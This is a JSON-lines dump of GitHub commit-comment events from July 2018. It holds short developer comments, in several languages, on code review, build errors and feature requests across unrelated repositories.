{"id":"7999744602","type":"CommitCommentEvent","actor":{"login":"sadaka-yamauchi"},"repo":{"name":"sdk-quadra/sabakutani"},"payload":{"comment":{"id":29791318,"position":4,"line":5,"path":"config/initializers/carrierwave.rb","commit_id":"cddf145a53523a98da931d0eeb16ea1036ae88ba","created_at":"2018-07-22T06:45:23Z","updated_at":"2018-07-22T06:45:23Z","author_association":"CONTRIBUTOR","body":"ここから下3行の値を削除"}},"created_at":"2018-07-22T06:45:23Z"}
{"id":"7999746397","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"nunomaduro/larastan"},"payload":{"comment":{"id":29791324,"position":null,"line":null,"path":null,"commit_id":"4c2525769f7559f40e6256466ea77d079f19f4ba","created_at":"2018-07-22T06:47:13Z","updated_at":"2018-07-22T06:47:13Z","author_association":"CONTRIBUTOR","body":"@nunomaduro I've ran\r\n`php artisan code:analyse --level=7 --paths=/home/viktor/src/gallerytool/vendor/nunomaduro/larastan/src/`\r\nwhich gave\r\n`PHP Fatal error:  Cannot redeclare Mockery_1_Mockery_0_PHPStan_Type_ObjectType_PHPStan_Type_ObjectType_Mockery_0_PHPStan_Type_ObjectType_PHPStan_Type_ObjectType::mockery_init()`\r\nWhat would you suggest?\r\n"}},"created_at":"2018-07-22T06:47:13Z"}
{"id":"7999749844","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29791330,"position":9,"line":36,"path":"src/io/jiyuujin/java/day18/Rectangle.java","commit_id":"2d24bd1b7f4e35cb370ebb06d569146b2f529284","created_at":"2018-07-22T06:50:43Z","updated_at":"2018-07-22T06:50:43Z","author_association":"COLLABORATOR","body":"ITお笑い番組があったら使えそうなネタだったね ( ＾∀＾)ｹﾞﾗｹﾞﾗ"}},"created_at":"2018-07-22T06:50:43Z"}
{"id":"7999755501","type":"CommitCommentEvent","actor":{"login":"xiaozhuai"},"repo":{"name":"lifei6671/mindoc"},"payload":{"comment":{"id":29791342,"position":null,"line":null,"path":null,"commit_id":"6921b2ed40b1b43cba4238f982367e3239ff28a9","created_at":"2018-07-22T06:56:20Z","updated_at":"2018-07-22T06:56:20Z","author_association":"NONE","body":"哈哈，是的，最近刚刚开始使用mindoc，非常好的一个项目！很赞！所以一直在关注有没有新的提交带来一些新的功能或者改善。\n\n\n开 2018年7月22日 在 下午1:59:55, Minho (notifications@github.com) 写到:\n\n刚提交，你就发现了。。。\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-22T06:56:20Z"}
{"id":"7999756644","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29791346,"position":16,"line":30,"path":"src/io/jiyuujin/java/day3/Introduction.java","commit_id":"f3275251904c2369744606a14e80254d8fc02b79","created_at":"2018-07-22T06:57:31Z","updated_at":"2018-07-22T06:57:31Z","author_association":"COLLABORATOR","body":"numberとcountのみたいな似てる単語の使い分けちゃんと確立しとかないと読みにくくなるから気をつけて〜\r\nちなみに私は件数はcount、numberは番号で使ってます\r\nこれ他にも似てる単語色々あるからちゃんと意識して理由づけして使わないと読みにくくなるから細かいこともちゃんと意識して命名する癖つける事！"}},"created_at":"2018-07-22T06:57:31Z"}
{"id":"7999756905","type":"CommitCommentEvent","actor":{"login":"cipig"},"repo":{"name":"atomiclabs/hyperdex"},"payload":{"comment":{"id":29791349,"position":null,"line":null,"path":null,"commit_id":"31d55a73254bacbcd8e90024ed698d15a26a5673","created_at":"2018-07-22T06:57:49Z","updated_at":"2018-07-22T06:57:49Z","author_association":"NONE","body":"Yes, the same coin symbols must be used across all nodes, else it won't match. We should use the same symbols across all apps. Problem is that coin symbols are not consistent on exchanges/CMC, eg look up BTM on CMC (it is used twice). I would recommend using other things to uniquely identify a coin, eg the id on CMC."}},"created_at":"2018-07-22T06:57:49Z"}
{"id":"7999757909","type":"CommitCommentEvent","actor":{"login":"xiaozhuai"},"repo":{"name":"lifei6671/mindoc"},"payload":{"comment":{"id":29791350,"position":null,"line":null,"path":null,"commit_id":"6921b2ed40b1b43cba4238f982367e3239ff28a9","created_at":"2018-07-22T06:58:55Z","updated_at":"2018-07-22T06:58:55Z","author_association":"NONE","body":"对了，有一个问题，就是私有项目的访问令牌，这个能否增加多个令牌？企业用户一般会为不同渠道分配不同的身份。另外如果能同时支持直接在query内填写令牌(即现在的方式)，和提供一个输出令牌(密码)的方式就更好了！一个小的建议。\n\n\n开 2018年7月22日 在 下午2:56:11, QQ邮箱 (798047000@qq.com) 写到:\n\n哈哈，是的，最近刚刚开始使用mindoc，非常好的一个项目！很赞！所以一直在关注有没有新的提交带来一些新的功能或者改善。\n\n\n开 2018年7月22日 在 下午1:59:55, Minho (notifications@github.com) 写到:\n\n刚提交，你就发现了。。。\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n"}},"created_at":"2018-07-22T06:58:55Z"}
{"id":"7999758521","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29791353,"position":16,"line":30,"path":"src/io/jiyuujin/java/day3/Introduction.java","commit_id":"f3275251904c2369744606a14e80254d8fc02b79","created_at":"2018-07-22T06:59:35Z","updated_at":"2018-07-22T06:59:35Z","author_association":"COLLABORATOR","body":"あといい加減Scanner使うとこラッパークラス作ってもいいかもねー\r\n例外発生するのcatchしたり、数値が来るまで延々リトライしてくれるラッパークラス\r\nそういうの自分で作ってクラス設計考えるのも重要だよ"}},"created_at":"2018-07-22T06:59:35Z"}
{"id":"7999759484","type":"CommitCommentEvent","actor":{"login":"lastnamearya"},"repo":{"name":"lastnamearya/React-Redux"},"payload":{"comment":{"id":29791365,"position":null,"line":null,"path":null,"commit_id":"4d7b5452590c29c94108ef6a6ff0c933c24e4c00","created_at":"2018-07-22T07:00:23Z","updated_at":"2018-07-22T07:00:23Z","author_association":"OWNER","body":"This code will not work because reducers are't defined we have to imort them explicity from a reducer file. "}},"created_at":"2018-07-22T07:00:23Z"}
{"id":"7999762175","type":"CommitCommentEvent","actor":{"login":"lifei6671"},"repo":{"name":"lifei6671/mindoc"},"payload":{"comment":{"id":29791371,"position":null,"line":null,"path":null,"commit_id":"6921b2ed40b1b43cba4238f982367e3239ff28a9","created_at":"2018-07-22T07:02:54Z","updated_at":"2018-07-22T07:02:54Z","author_association":"OWNER","body":"您可以发个issue记录下。"}},"created_at":"2018-07-22T07:02:54Z"}
{"id":"7999766132","type":"CommitCommentEvent","actor":{"login":"jrnladhad"},"repo":{"name":"jrnladhad/symmetryworks-research-bowdoin"},"payload":{"comment":{"id":29791380,"position":null,"line":null,"path":null,"commit_id":"385d0d42e4c2569ae2f9ccec60d23fee7c302473","created_at":"2018-07-22T07:06:38Z","updated_at":"2018-07-22T07:06:38Z","author_association":"OWNER","body":"User guide for Sphere Skins software."}},"created_at":"2018-07-22T07:06:38Z"}
{"id":"7999766295","type":"CommitCommentEvent","actor":{"login":"Stevenhork"},"repo":{"name":"Stevenhork/JDBC"},"payload":{"comment":{"id":29791381,"position":null,"line":null,"path":null,"commit_id":"38cca3b8d18abca8bdfbd93d5707fb61b3c4ac16","created_at":"2018-07-22T07:06:48Z","updated_at":"2018-07-22T07:06:48Z","author_association":"OWNER","body":"JBDC实现连接数据库IBM DB2；"}},"created_at":"2018-07-22T07:06:48Z"}
{"id":"7999768012","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"MSF-Jarvis/dotfiles"},"payload":{"comment":{"id":29791384,"position":14,"line":34,"path":"setup.sh","commit_id":"46453e1e2c87ee3c63068ad39adf1490b03f5bc8","created_at":"2018-07-22T07:08:25Z","updated_at":"2018-07-22T07:08:25Z","author_association":"CONTRIBUTOR","body":"Wew I need to kang dis"}},"created_at":"2018-07-22T07:08:25Z"}
{"id":"7999768213","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"MSF-Jarvis/dotfiles"},"payload":{"comment":{"id":29791385,"position":4,"line":80,"path":"apps","commit_id":"c00ded665122caf48ac45a483db68552cc753524","created_at":"2018-07-22T07:08:35Z","updated_at":"2018-07-22T07:08:35Z","author_association":"CONTRIBUTOR","body":"Wau."}},"created_at":"2018-07-22T07:08:35Z"}
{"id":"7999768474","type":"CommitCommentEvent","actor":{"login":"nikkobautista"},"repo":{"name":"spenserhale/scientist-psr3-journal"},"payload":{"comment":{"id":29791386,"position":17,"line":16,"path":"composer.json","commit_id":"26fc513431710561c9d456d6e79920c5a1acd1ac","created_at":"2018-07-22T07:08:50Z","updated_at":"2018-07-22T07:08:50Z","author_association":"NONE","body":"Sounds good - thank you! "}},"created_at":"2018-07-22T07:08:50Z"}
{"id":"7999769373","type":"CommitCommentEvent","actor":{"login":"lukechilds"},"repo":{"name":"atomiclabs/hyperdex"},"payload":{"comment":{"id":29791390,"position":null,"line":null,"path":null,"commit_id":"31d55a73254bacbcd8e90024ed698d15a26a5673","created_at":"2018-07-22T07:09:41Z","updated_at":"2018-07-22T07:09:41Z","author_association":"MEMBER","body":"Ok, thanks for the info @cipig.\r\n\r\n@sindresorhus yeah I definitely think we should do that then."}},"created_at":"2018-07-22T07:09:41Z"}
{"id":"7999770854","type":"CommitCommentEvent","actor":{"login":"matthewroccocavallo"},"repo":{"name":"matthewroccocavallo/LaborScreenCapture"},"payload":{"comment":{"id":29791393,"position":null,"line":null,"path":null,"commit_id":"c1832b981827fbb30cb9f22ca77f5340c69d641d","created_at":"2018-07-22T07:11:08Z","updated_at":"2018-07-22T07:11:08Z","author_association":"OWNER","body":"2 Buttons and 1 Slider\r\n*Start Button*\r\n*Folder location indicator button*\r\n*Interval for taking screenshots Slider*\r\n"}},"created_at":"2018-07-22T07:11:08Z"}
{"id":"7999771354","type":"CommitCommentEvent","actor":{"login":"bsdshell"},"repo":{"name":"bsdshell/bsdshell.github.io"},"payload":{"comment":{"id":29791394,"position":null,"line":null,"path":null,"commit_id":"52816a7c5e0d31b2a4e23a7cdafd1ed065d22af4","created_at":"2018-07-22T07:11:39Z","updated_at":"2018-07-22T07:11:39Z","author_association":"OWNER","body":"The symbol links causes lots of problem"}},"created_at":"2018-07-22T07:11:39Z"}
{"id":"7999771438","type":"CommitCommentEvent","actor":{"login":"DoNotSpamPls"},"repo":{"name":"WaterfallMC/Waterfall"},"payload":{"comment":{"id":29791397,"position":4,"line":9,"path":"BungeeCord-Patches/0007-Get-rid-of-the-security-manager.patch","commit_id":"126c0d88ddd55d0e9766d28fd6d81cd3960970ee","created_at":"2018-07-22T07:11:44Z","updated_at":"2018-07-22T07:11:44Z","author_association":"NONE","body":"wait what?"}},"created_at":"2018-07-22T07:11:44Z"}
{"id":"7999771507","type":"CommitCommentEvent","actor":{"login":"parvaizmuhd"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29791398,"position":1,"line":3,"path":".github/lock.yml","commit_id":"56b1fe71f59d3f59202f5949ebc48af606e5f89c","created_at":"2018-07-22T07:11:48Z","updated_at":"2018-07-22T07:11:48Z","author_association":"NONE","body":"no under stand\r\n"}},"created_at":"2018-07-22T07:11:48Z"}
{"id":"7999771930","type":"CommitCommentEvent","actor":{"login":"bsdshell"},"repo":{"name":"bsdshell/bsdshell.github.io"},"payload":{"comment":{"id":29791401,"position":null,"line":null,"path":null,"commit_id":"52816a7c5e0d31b2a4e23a7cdafd1ed065d22af4","created_at":"2018-07-22T07:12:14Z","updated_at":"2018-07-22T07:12:14Z","author_association":"OWNER","body":"You never want to have to symbol link on your site"}},"created_at":"2018-07-22T07:12:14Z"}
{"id":"7999772339","type":"CommitCommentEvent","actor":{"login":"parvaizmuhd"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29791403,"position":null,"line":null,"path":null,"commit_id":"56b1fe71f59d3f59202f5949ebc48af606e5f89c","created_at":"2018-07-22T07:12:39Z","updated_at":"2018-07-22T07:12:39Z","author_association":"NONE","body":"@web-flow "}},"created_at":"2018-07-22T07:12:39Z"}
{"id":"7999774369","type":"CommitCommentEvent","actor":{"login":"kotatamura1027"},"repo":{"name":"kotatamura1027/portfolio"},"payload":{"comment":{"id":29791408,"position":null,"line":null,"path":null,"commit_id":"bb69f3d45ae9bc89ecbb456bf280d12d347411ca","created_at":"2018-07-22T07:14:38Z","updated_at":"2018-07-22T07:14:38Z","author_association":"OWNER","body":"This is a Python script that combines all the PDF files except for the first cover page"}},"created_at":"2018-07-22T07:14:38Z"}
{"id":"7999778446","type":"CommitCommentEvent","actor":{"login":"xulek"},"repo":{"name":"CherryKodi/cherry-dev"},"payload":{"comment":{"id":29791423,"position":47,"line":null,"path":"plugin.video.fanfilm/resources/lib/sources/pl/iitvx.py","commit_id":"c0aea93458a45b809ca028c35d7755460396fb22","created_at":"2018-07-22T07:18:30Z","updated_at":"2018-07-22T07:18:30Z","author_association":"COLLABORATOR","body":"tak, jest to nieudolna próba nadpisania :D"}},"created_at":"2018-07-22T07:18:30Z"}
{"id":"7999792615","type":"CommitCommentEvent","actor":{"login":"fightingting621"},"repo":{"name":"fightingting621/tmall"},"payload":{"comment":{"id":29791445,"position":82,"line":82,"path":"js/dom-window.html","commit_id":"58c2dbe41478592e61850a71379659b9656da932","created_at":"2018-07-22T07:31:46Z","updated_at":"2018-07-22T07:31:46Z","author_association":"OWNER","body":";"}},"created_at":"2018-07-22T07:31:46Z"}
{"id":"7999795325","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29791447,"position":21,"line":14,"path":"lesson1/triangle.rb","commit_id":"c40afe10c00dd9294e8fb74bf342fbf72a318eb7","created_at":"2018-07-22T07:34:18Z","updated_at":"2018-07-22T07:34:18Z","author_association":"NONE","body":"Прости, я тебе наврал, когда пример приводил и назвал переменную по привычке с вопросом в конце. С вопросом в конце по конвенциям в руби называются методы, которые возвращают true, или false.Таким образом код лучше читается. Но в данном случае у тебя переменные и называть их с вопросом нельзя. Следовало просто убрать знак вопроса в конце, и все бы заработало."}},"created_at":"2018-07-22T07:34:18Z"}
{"id":"7999795866","type":"CommitCommentEvent","actor":{"login":"coin-info-net"},"repo":{"name":"duality-solutions/yiimp"},"payload":{"comment":{"id":29791451,"position":null,"line":null,"path":null,"commit_id":"464e6511bd6b21043d43519a48476fcf53038f85","created_at":"2018-07-22T07:34:48Z","updated_at":"2018-07-22T07:34:48Z","author_association":"MEMBER","body":"Is it an working DYN Miner ?\r\nU cant use every Argon2 Miner, because DYN needs different settings in the Algo"}},"created_at":"2018-07-22T07:34:48Z"}
{"id":"7999795868","type":"CommitCommentEvent","actor":{"login":"shizonic"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29791452,"position":null,"line":null,"path":null,"commit_id":"35fec03775ac298d477994ca02f26190f55436c6","created_at":"2018-07-22T07:34:48Z","updated_at":"2018-07-22T07:34:48Z","author_association":"CONTRIBUTOR","body":"Since the revision bump the package `polybar` is broken. I get the follow error if I try to run my bar:\r\n```\r\npolybar: symbol lookup error: polybar: undefined symbol: _ZN4Json5ValueC1ERKSs\r\n```\r\nA report with this issue exists on the official repository too:\r\nhttps://github.com/jaagr/polybar/issues/1336\r\n\r\nIf I downgrade jsoncpp to version 1.8.4_1 everything works again. Any suggestions?"}},"created_at":"2018-07-22T07:34:48Z"}
{"id":"7999796548","type":"CommitCommentEvent","actor":{"login":"Robbbert"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29791454,"position":null,"line":null,"path":null,"commit_id":"ff2b31834380fb5966a31a1f415d44775a11d300","created_at":"2018-07-22T07:35:30Z","updated_at":"2018-07-22T07:35:30Z","author_association":"CONTRIBUTOR","body":"Fails validation:\r\n\r\n6 errors, 0 warnings\r\nErrors:\r\n   Device 315_5124.cpp(sega315_5246) reports type '19sega315_5246_device' (created with '19sega315_5313_device')\r\n   Device 315_5124.cpp(sega315_5246) short name is a duplicate of 315_5124.cpp(sega315_5246)\r\n   Device 315_5124.cpp(sega315_5246) name 'Sega 315-5246 SMS2 VDP' is a duplicate of 315_5124.cpp(sega315_5246)\r\n   Device 315_5124.cpp(sega315_5246) short name is a duplicate of 315_5124.cpp(sega315_5246)\r\n   Device 315_5124.cpp(sega315_5246) name 'Sega 315-5246 SMS2 VDP' is a duplicate of 315_5124.cpp(sega315_5246)\r\n   Device 315_5124.cpp(sega315_5246) reports type '19sega315_5246_device' (created with '19sega315_5377_device')\r\n\r\nValidity check failed (6 errors, 0 warnings in total)\r\n\r\n"}},"created_at":"2018-07-22T07:35:30Z"}
{"id":"7999798783","type":"CommitCommentEvent","actor":{"login":"nize1989"},"repo":{"name":"apache/incubator-skywalking"},"payload":{"comment":{"id":29791456,"position":null,"line":null,"path":null,"commit_id":"06b6f0543854db4f5a238daa5ceea808f120fab1","created_at":"2018-07-22T07:37:41Z","updated_at":"2018-07-22T07:37:41Z","author_association":"NONE","body":"我就想问问：有几个按照这份说明在idea把项目编译通过的？\"1. 设置gRPC的自动生成代码目录，为源码目录\"这一步apm-network包下的proto文件夹下根本就没有.proto文件，编译maven怎么会有源代码出现？逗我？"}},"created_at":"2018-07-22T07:37:41Z"}
{"id":"7999798912","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29791457,"position":null,"line":null,"path":null,"commit_id":"60cb6c7d4615ca3143a93a8ffe5f1eb466942735","created_at":"2018-07-22T07:37:49Z","updated_at":"2018-07-22T07:37:49Z","author_association":"NONE","body":"@Stefano80 \r\nI  have approved your tests. It would be nice if you look also for my pending tests (2x prio 0, 4x prio -1) :-)"}},"created_at":"2018-07-22T07:37:49Z"}
{"id":"7999799121","type":"CommitCommentEvent","actor":{"login":"ThanaboonS"},"repo":{"name":"tonii2tone/WanJiab"},"payload":{"comment":{"id":29791459,"position":null,"line":null,"path":null,"commit_id":"ffa581b599a4e1eb3c6e15c9805ef7ddb0fd0e96","created_at":"2018-07-22T07:38:01Z","updated_at":"2018-07-22T07:38:01Z","author_association":"COLLABORATOR","body":"ngaw"}},"created_at":"2018-07-22T07:38:01Z"}
{"id":"7999799342","type":"CommitCommentEvent","actor":{"login":"johngf"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29791460,"position":null,"line":null,"path":null,"commit_id":"d198afb6b5a77d1119f2df15342269c85ece6731","created_at":"2018-07-22T07:38:12Z","updated_at":"2018-07-22T07:38:12Z","author_association":"COLLABORATOR","body":"@razorex tu sais aEntry[] c'est déjà un string pas besoin de rajouter str "}},"created_at":"2018-07-22T07:38:12Z"}
{"id":"7999799827","type":"CommitCommentEvent","actor":{"login":"blackspherefollower"},"repo":{"name":"buttplugio/buttplug-csharp"},"payload":{"comment":{"id":29791461,"position":null,"line":null,"path":null,"commit_id":"9f5cb8d0cf41f69b62eb176319077cf118ef29e6","created_at":"2018-07-22T07:38:40Z","updated_at":"2018-07-22T07:38:40Z","author_association":"CONTRIBUTOR","body":"Don't forget to add the name to the DualVibes lists too."}},"created_at":"2018-07-22T07:38:40Z"}
{"id":"7999800369","type":"CommitCommentEvent","actor":{"login":"ShiKaiWi"},"repo":{"name":"linlycode/olcode"},"payload":{"comment":{"id":29791462,"position":41,"line":38,"path":"devops/constants.py","commit_id":"39a9eb4296b7686fd2275423b3494e889c781671","created_at":"2018-07-22T07:39:15Z","updated_at":"2018-07-22T07:39:15Z","author_association":"COLLABORATOR","body":"set workdircreated after creating"}},"created_at":"2018-07-22T07:39:15Z"}
{"id":"7999800498","type":"CommitCommentEvent","actor":{"login":"nutza209"},"repo":{"name":"tanapone/UncleSomboon"},"payload":{"comment":{"id":29791463,"position":null,"line":null,"path":null,"commit_id":"1034a1caf4f90e5678bd9a1638a1f0ad48397ad7","created_at":"2018-07-22T07:39:23Z","updated_at":"2018-07-22T07:39:23Z","author_association":"COLLABORATOR","body":"comment"}},"created_at":"2018-07-22T07:39:23Z"}
{"id":"7999800678","type":"CommitCommentEvent","actor":{"login":"pinponja"},"repo":{"name":"tanapone/UncleSomboon"},"payload":{"comment":{"id":29791464,"position":null,"line":null,"path":null,"commit_id":"1034a1caf4f90e5678bd9a1638a1f0ad48397ad7","created_at":"2018-07-22T07:39:34Z","updated_at":"2018-07-22T07:39:34Z","author_association":"COLLABORATOR","body":"nice"}},"created_at":"2018-07-22T07:39:34Z"}
{"id":"7999801603","type":"CommitCommentEvent","actor":{"login":"ShiKaiWi"},"repo":{"name":"linlycode/olcode"},"payload":{"comment":{"id":29791465,"position":6,"line":6,"path":"devops/common/proc.py","commit_id":"39a9eb4296b7686fd2275423b3494e889c781671","created_at":"2018-07-22T07:40:24Z","updated_at":"2018-07-22T07:40:24Z","author_association":"COLLABORATOR","body":"Better to encapsulate this pid file name generation to a function"}},"created_at":"2018-07-22T07:40:24Z"}
{"id":"7999801728","type":"CommitCommentEvent","actor":{"login":"oritwas"},"repo":{"name":"lil-val/battleship_game"},"payload":{"comment":{"id":29791466,"position":10,"line":12,"path":"battleship_boards.py","commit_id":"641fab87ed7cc65e4ec2f3533199388a7eb38dc8","created_at":"2018-07-22T07:40:31Z","updated_at":"2018-07-22T07:40:31Z","author_association":"NONE","body":"please make the board size (length and width) a parameter. I recommend passing it as a parameter to the Board constructor so it can be configurable:\r\ndef __init(self, ength = 10, width=10)"}},"created_at":"2018-07-22T07:40:31Z"}
{"id":"7999803458","type":"CommitCommentEvent","actor":{"login":"oritwas"},"repo":{"name":"lil-val/battleship_game"},"payload":{"comment":{"id":29791472,"position":58,"line":56,"path":"battleship_boards.py","commit_id":"641fab87ed7cc65e4ec2f3533199388a7eb38dc8","created_at":"2018-07-22T07:42:21Z","updated_at":"2018-07-22T07:42:21Z","author_association":"NONE","body":"missing documentation"}},"created_at":"2018-07-22T07:42:21Z"}
{"id":"7999803989","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29791474,"position":29,"line":19,"path":"lesson1/triangle.rb","commit_id":"c40afe10c00dd9294e8fb74bf342fbf72a318eb7","created_at":"2018-07-22T07:42:55Z","updated_at":"2018-07-22T07:42:55Z","author_association":"NONE","body":"Так в принципе работает (только индентацию стоило бы поправить), но нужно стараться по возможности избегать вложенных ифов. Вложенность усложняет чтение кода (увеличивает его цикломатическую сложность). Тут можно привести к одному уровню вложенности примерно вот так: (учитывая, что ты вереншь переменные, только без знаков вопроса)\r\n```\r\nif isosceles\r\n  puts ...\r\n  exit\r\nelsif rectangular && equilateral\r\n  puts \"прямоугольный и равнобедренный\"\r\nelsif rectangular\r\n  puts \"прямоугольный\"\r\nend\r\n```\r\nЗдесь важно понимать, что проверка на прямоугольность И равнобедренность, должна идти перед проверкой на только равнобедренность. Потому-что если поменять эти условия местами, то программа будет работать не корректно и никогда не дойдет до проверки на равнобедренность"}},"created_at":"2018-07-22T07:42:55Z"}
{"id":"7999807352","type":"CommitCommentEvent","actor":{"login":"ShiKaiWi"},"repo":{"name":"linlycode/olcode"},"payload":{"comment":{"id":29791485,"position":26,"line":25,"path":"devops/dev.py","commit_id":"39a9eb4296b7686fd2275423b3494e889c781671","created_at":"2018-07-22T07:46:05Z","updated_at":"2018-07-22T07:46:05Z","author_association":"COLLABORATOR","body":"How about avoiding any specific service module just passing the name to the base class Deployer(need a better name) to create an abstract service"}},"created_at":"2018-07-22T07:46:05Z"}
{"id":"7999807895","type":"CommitCommentEvent","actor":{"login":"lnandi1"},"repo":{"name":"PyConPL/Book"},"payload":{"comment":{"id":29791486,"position":null,"line":null,"path":null,"commit_id":"65aea6a378d5af82925293bb26f3f0e43a3632c6","created_at":"2018-07-22T07:46:33Z","updated_at":"2018-07-22T07:46:33Z","author_association":"CONTRIBUTOR","body":"**jjj**"}},"created_at":"2018-07-22T07:46:33Z"}
{"id":"7999811397","type":"CommitCommentEvent","actor":{"login":"kennyzx"},"repo":{"name":"kennyzx/DotNetCore"},"payload":{"comment":{"id":29791488,"position":null,"line":null,"path":null,"commit_id":"12fa092bc1dd325a2cbf9001630d3551551b5f55","created_at":"2018-07-22T07:49:54Z","updated_at":"2018-07-22T07:49:54Z","author_association":"OWNER","body":"CSS priority: The specialty of the selectors matters. \r\n\r\n    .navbar-inverse .red{\r\n        background-color: #7e0000;\r\n    }\r\n\r\n are 2 class selectors, why this does not take priority over  \r\n\r\n    .navbar-inverse {        \r\n        background-color:#222;"}},"created_at":"2018-07-22T07:49:54Z"}
{"id":"7999811840","type":"CommitCommentEvent","actor":{"login":"recall704"},"repo":{"name":"recall704/tinyFecVPN"},"payload":{"comment":{"id":29791489,"position":null,"line":null,"path":null,"commit_id":"f06b67db103a6a77efe63f4ea9653c8b7a3d82fc","created_at":"2018-07-22T07:50:17Z","updated_at":"2018-07-22T07:50:17Z","author_association":"OWNER","body":"我也不知道，我也不会"}},"created_at":"2018-07-22T07:50:17Z"}
{"id":"7999814268","type":"CommitCommentEvent","actor":{"login":"tobbi"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29791492,"position":10,"line":144,"path":"src/supertux/game_session_recorder.cpp","commit_id":"8a8b67d2646dd4ddec5f6efcc628fc75d1dbfbf7","created_at":"2018-07-22T07:52:40Z","updated_at":"2018-07-22T07:52:40Z","author_association":"MEMBER","body":"Or make that function take \"char...\""}},"created_at":"2018-07-22T07:52:40Z"}
{"id":"7999814476","type":"CommitCommentEvent","actor":{"login":"kounelios13"},"repo":{"name":"TWENTY3andCo/maintenance"},"payload":{"comment":{"id":29791493,"position":null,"line":null,"path":null,"commit_id":"7824e3d0b4f544c2276add59cd72082dfda1cc95","created_at":"2018-07-22T07:52:52Z","updated_at":"2018-07-22T07:52:52Z","author_association":"MEMBER","body":"Good Job "}},"created_at":"2018-07-22T07:52:52Z"}
{"id":"7999814975","type":"CommitCommentEvent","actor":{"login":"wu-sheng"},"repo":{"name":"apache/incubator-skywalking"},"payload":{"comment":{"id":29791494,"position":null,"line":null,"path":null,"commit_id":"06b6f0543854db4f5a238daa5ceea808f120fab1","created_at":"2018-07-22T07:53:21Z","updated_at":"2018-07-22T07:53:21Z","author_association":"MEMBER","body":"You need to read build document. You miss the important parts."}},"created_at":"2018-07-22T07:53:21Z"}
{"id":"7999815099","type":"CommitCommentEvent","actor":{"login":"tobbi"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29791495,"position":5,"line":100,"path":"src/math/random_generator.cpp","commit_id":"52567b63a237c5993665edcc8accb54821940401","created_at":"2018-07-22T07:53:27Z","updated_at":"2018-07-22T07:53:27Z","author_association":"MEMBER","body":"Try it out and submit a PR."}},"created_at":"2018-07-22T07:53:27Z"}
{"id":"7999816111","type":"CommitCommentEvent","actor":{"login":"lychichem"},"repo":{"name":"googlehosts/hosts"},"payload":{"comment":{"id":29791496,"position":null,"line":null,"path":null,"commit_id":"2ff7b68dc7ee48e038160a16df79202b0ac3e525","created_at":"2018-07-22T07:54:23Z","updated_at":"2018-07-22T07:54:23Z","author_association":"NONE","body":"还需要加上images-fe.ssl-images-amazon.com，现在卡这个了……图片和css载不出来"}},"created_at":"2018-07-22T07:54:23Z"}
{"id":"7999816146","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"lilydjwg/nvchecker"},"payload":{"comment":{"id":29791497,"position":5,"line":21,"path":"setup.py","commit_id":"00f7dccb399429cce9ee2068ef6ee7ca2bce0597","created_at":"2018-07-22T07:54:25Z","updated_at":"2018-07-22T07:54:25Z","author_association":"CONTRIBUTOR","body":"Tornado 5 還在[community-staging]哩～今天早上9點lilac因此而罷工了\r\n\r\n```\r\nTraceback (most recent call last):\r\n  File \"/usr/lib/python3.6/site-packages/pkg_resources/__init__.py\", line 570, in _build_master\r\n    ws.require(__requires__)\r\n  File \"/usr/lib/python3.6/site-packages/pkg_resources/__init__.py\", line 888, in require\r\n    needed = self.resolve(parse_requirements(requirements))\r\n  File \"/usr/lib/python3.6/site-packages/pkg_resources/__init__.py\", line 779, in resolve\r\n    raise VersionConflict(dist, req).with_context(dependent_req)\r\npkg_resources.ContextualVersionConflict: (tornado 4.5.3 (/usr/lib/python3.6/site-packages), Requirement.parse('tornado>=5'), {'nvchecker'})\r\n\r\nDuring handling of the above exception, another exception occurred:\r\n\r\nTraceback (most recent call last):\r\n  File \"/usr/bin/nvchecker\", line 6, in <module>\r\n    from pkg_resources import load_entry_point\r\n  File \"/usr/lib/python3.6/site-packages/pkg_resources/__init__.py\", line 3095, in <module>\r\n    @_call_aside\r\n  File \"/usr/lib/python3.6/site-packages/pkg_resources/__init__.py\", line 3079, in _call_aside\r\n    f(*args, **kwargs)\r\n  File \"/usr/lib/python3.6/site-packages/pkg_resources/__init__.py\", line 3108, in _initialize_master_working_set\r\n    working_set = WorkingSet._build_master()\r\n  File \"/usr/lib/python3.6/site-packages/pkg_resources/__init__.py\", line 572, in _build_master\r\n    return cls._build_from_requirements(__requires__)\r\n  File \"/usr/lib/python3.6/site-packages/pkg_resources/__init__.py\", line 585, in _build_from_requirements\r\n    dists = ws.resolve(reqs, Environment())\r\n  File \"/usr/lib/python3.6/site-packages/pkg_resources/__init__.py\", line 774, in resolve\r\n    raise DistributionNotFound(req, requirers)\r\npkg_resources.DistributionNotFound: The 'tornado>=5' distribution was not found and is required by nvchecker\r\n```"}},"created_at":"2018-07-22T07:54:25Z"}
